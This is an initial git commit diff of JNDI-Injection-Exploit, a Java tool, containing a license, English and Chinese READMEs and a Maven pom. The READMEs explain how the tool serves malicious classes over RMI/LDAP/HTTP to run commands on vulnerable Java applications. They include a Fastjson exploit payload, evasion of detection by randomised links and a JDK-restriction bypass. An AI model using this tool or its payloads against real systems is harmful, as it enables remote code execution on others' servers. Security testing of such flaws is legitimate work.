init

Author: cckuailong

.gitignore

@@ -0,0 +1,3 @@
+out/
+target/
+.idea/

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2019 welk1n
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README-CN.md

@@ -0,0 +1,95 @@
+## 介绍
+
+JNDI注入利用工具，生成JNDI链接并启动后端相关服务，可用于Fastjson、Jackson等相关漏洞的验证。
+
+## 使用
+
+可执行程序为jar包，在命令行中运行以下命令：
+
+```shell
+$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+```
+
+其中:
+
+- **-C** - 远程class文件中要执行的命令。
+
+  （可选项 , 默认命令是mac下打开计算器，即"open /Applications/Calculator.app"）
+
+- **-A** - 服务器地址，可以是IP地址或者域名。
+
+  （可选项 , 默认地址是第一个网卡地址）
+
+注意:
+
+- 要确保 **1099**、**1389**、**8180**端口可用，不被其他程序占用。
+
+  或者你也可以在run.ServerStart类26~28行更改默认端口。
+
+- 命令会被作为参数传入**Runtime.getRuntime().exec()**，
+
+  所以需要确保命令传入exec()方法可执行。
+  
+  **bash等可在shell直接执行的相关命令需要加双引号，比如说 java -jar JNDI.jar -C "bash -c ..."**
+
+## 示例
+
+### 本地演示：
+
+1. 启动 JNDI-Injection-Exploit：
+
+   ```shell
+   $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
+   ```
+
+    截图：
+    ![](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/screenshots/1.png)
+
+
+2. 我们需要把第一步中生成的 JNDI链接注入到存在漏洞的应用环境中，方便解释用如下代码模仿漏洞环境：
+
+   ```java
+   public static void main(String[] args) throws Exception{
+       InitialContext ctx = new InitialContext();
+       ctx.lookup("rmi://127.0.0.1/fgf4fp");
+   }
+   ```
+
+   当上面代码运行后，应用便会执行相应命令，这里是弹出计算器，没截图，可以自己测一下。
+
+   截图是工具的server端日志：
+
+    ![](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/screenshots/2.png)
+
+
+
+## 安装
+
+下面两种方法都可以得到Jar包
+
+1. 从 [Realease](https://github.com/welk1n/JNDI-Injection-Exploit/releases)直接下载最新的Jar。
+
+2. 把源码下载到本地然后自行编译打包。（在Java1.7+ 、Java1.8+ 和 Maven 3.x+环境下测试可以）
+
+   ```shell
+   $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
+   ```
+
+   ```shell
+   $ cd JNDI-Injection-Exploit
+   ```
+
+   ```shell
+   $ mvn clean package -DskipTests
+   ```
+
+## 工具实现
+
+1. 首先生成的链接后面codebaseClass是6位随机的，这个是因为不希望让工具生成的链接本身成为一种特征被监控或拦截。
+2. 服务器地址实际就是codebase地址，相比于marshalsec中的JNDI server来说，这个工具把JNDI server和HTTP server绑定到一起，并自动启动HTTP server返回相应class，更自动化了。
+3. HTTP server基于jetty实现的，本质上是一个能下载文件的servlet，比较有意思的是我提前编译好class模板放到resource目录，然后servlet会读取class文件，使用ASM框架对读取的字节码进行修改，然后插入我们想要执行的命令，返回修改后的字节码。
+
+## 待实现
+
+- （已完成EL表达式绕过部分）在更高版本的JDK环境中trustURLCodebase变量为false，限制了远程类的加载，我会找时间把[JNDI-Injection-Bypass](https://github.com/welk1n/JNDI-Injection-Bypass)这个项目的东西融入到本项目中，生成能绕过JDK限制JNDI链接。
+- … ...

README.md

@@ -0,0 +1,113 @@
+# JNDI-Injection-Exploit
+
+[Materials about JNDI Injection](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf)
+
+[中文文档](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md)
+
+[相关文章](https://www.cnblogs.com/Welk1n/p/11066397.html)
+
+## Description
+
+JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on  [marshals](https://github.com/mbechler/marshalsec) and modified further to link with HTTP server. 
+
+Using this tool allows you get JNDI links, you can insert these links into your **POC** to test vulnerability. 
+
+For example, this is a Fastjson vul-poc:
+
+```json
+{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}
+```
+
+We can replace  "rmi://127.0.0.1:1099/Object" with the link generated by JNDI-Injection-Exploit to test vulnerability. 
+
+## Disclaimer
+
+All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.
+
+## Usage
+
+ Run as
+
+```shell
+$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+```
+
+where:
+
+- **-C** - command executed in the remote classfile.
+
+  (optional , default command is "open /Applications/Calculator.app")
+
+- **-A** - the address of your server, maybe an IP address or a domain.
+
+  (optional , default address is the first network interface address)
+
+Points for attention:
+
+- make sure your server's ports (**1099**, **1389**, **8180**) are available .
+
+  or you can change the default port in the run.ServerStart class line 26~28.
+
+- your command is passed to **Runtime.getRuntime().exec()** as parameters, 
+
+  so you need to ensure your command is workable in method exec().
+  
+  **Command in bash like "bash -c ...." need to add Double quotes.**
+
+## Examples
+
+ Local demo:
+
+1. Start the tool like this:
+
+   ```shell
+   $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
+   ```
+
+    Screenshot:
+
+   ![image-20191018154346759](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/screenshots/1.png)
+
+2. Assume that we inject the JNDI links like rmi://ADDRESS/jfxllc generated in step 1 to a vulnerable application which can be attacked by JNDI injection.
+
+   In this example, it looks like this:
+
+   ```java
+   public static void main(String[] args) throws Exception{
+       InitialContext ctx = new InitialContext();
+       ctx.lookup("rmi://127.0.0.1/fgf4fp");
+   }
+   ```
+
+   then when we run this code, the command will be executed ,
+
+   and the log will be printed in shell:
+
+   ![image-20191018154515787](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/screenshots/2.png)
+
+
+
+## Installation
+
+We can select one of the two methods to get the jar.
+
+1. Download the latest jar from [Realease](https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar).
+
+2. Clone the source code to local and build (Requires Java 1.8+ and Maven 3.x+).
+
+   ```shell
+   $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
+   ```
+
+   ```shell
+   $ cd JNDI-Injection-Exploit
+   ```
+
+   ```shell
+   $ mvn clean package -DskipTests
+   ```
+
+## To do
+
+- (**Done**)Combine this project and [JNDI-Injection-Bypass](https://github.com/welk1n/JNDI-Injection-Bypass) to generate workable links when **trustURLCodebase is false** in higher versions of JDK by default.
+- … ...

pom.xml

@@ -0,0 +1,138 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>welk1n</groupId>
+    <artifactId>JNDI-Injection-Exploit</artifactId>
+    <version>2.0-SNAPSHOT</version>
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+        <jetty.version>8.1.9.v20130131</jetty.version>
+        <compiler.version>1.8</compiler.version>
+        <java.version>1.8</java.version>
+        <maven.compiler.encoding>UTF-8</maven.compiler.encoding>
+        <maven.compiler.source>1.8</maven.compiler.source>
+        <maven.compiler.target>1.8</maven.compiler.target>
+    </properties>
+
+
+    <dependencies>
+        <!-- Util -->
+        <dependency>
+            <groupId>org.ow2.asm</groupId>
+            <artifactId>asm</artifactId>
+            <version>7.1</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.19.0-GA</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.reflections</groupId>
+            <artifactId>reflections</artifactId>
+            <version>0.9.9</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.slf4j</groupId>
+            <artifactId>slf4j-nop</artifactId>
+            <version>1.7.24</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-lang3</artifactId>
+            <version>3.4</version>
+        </dependency>
+
+        <dependency>
+            <groupId>commons-cli</groupId>
+            <artifactId>commons-cli</artifactId>
+            <version>1.3</version>
+        </dependency>
+
+
+        <!-- For LDAP reference jndi -->
+        <dependency>
+            <groupId>com.unboundid</groupId>
+            <artifactId>unboundid-ldapsdk</artifactId>
+            <version>3.1.1</version>
+        </dependency>
+
+        <!-- Jetty -->
+        <dependency>
+            <groupId>org.eclipse.jetty.aggregate</groupId>
+            <artifactId>jetty-webapp</artifactId>
+            <version>${jetty.version}</version>
+        </dependency>
+
+        <!-- Bypass JDK 1.8.0_191+ -->
+<!--        <dependency>-->
+<!--            <groupId>org.springframework.boot</groupId>-->
+<!--            <artifactId>spring-boot-starter-web</artifactId>-->
+<!--            <version>2.1.1.RELEASE</version>-->
+<!--        </dependency>-->
+
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-catalina</artifactId>
+            <version>8.5.38</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-jasper-el</artifactId>
+            <version>8.5.38</version>
+        </dependency>
+<!--        <dependency>-->
+<!--            <groupId>org.codehaus.groovy</groupId>-->
+<!--            <artifactId>groovy</artifactId>-->
+<!--            <version>2.4.5</version>-->
+<!--        </dependency>-->
+
+        <!-- test -->
+        <dependency>
+            <groupId>junit</groupId>
+            <artifactId>junit</artifactId>
+            <version>4.12</version>
+            <scope>test</scope>
+        </dependency>
+    </dependencies>
+
+
+    <build>
+        <plugins>
+            <plugin>
+                <artifactId>maven-assembly-plugin</artifactId>
+                <version>2.5.5</version>
+                <configuration>
+                    <finalName>${project.artifactId}-${project.version}-all</finalName>
+                    <appendAssemblyId>false</appendAssemblyId>
+                    <descriptorRefs>
+                        <descriptorRef>jar-with-dependencies</descriptorRef>
+                    </descriptorRefs>
+                    <archive>
+                        <manifest>
+                            <mainClass>run.ServerStart</mainClass>
+                        </manifest>
+                    </archive>
+                </configuration>
+                <executions>
+                    <execution>
+                        <id>make-assembly</id>
+                        <phase>package</phase>
+                        <goals>
+                            <goal>single</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>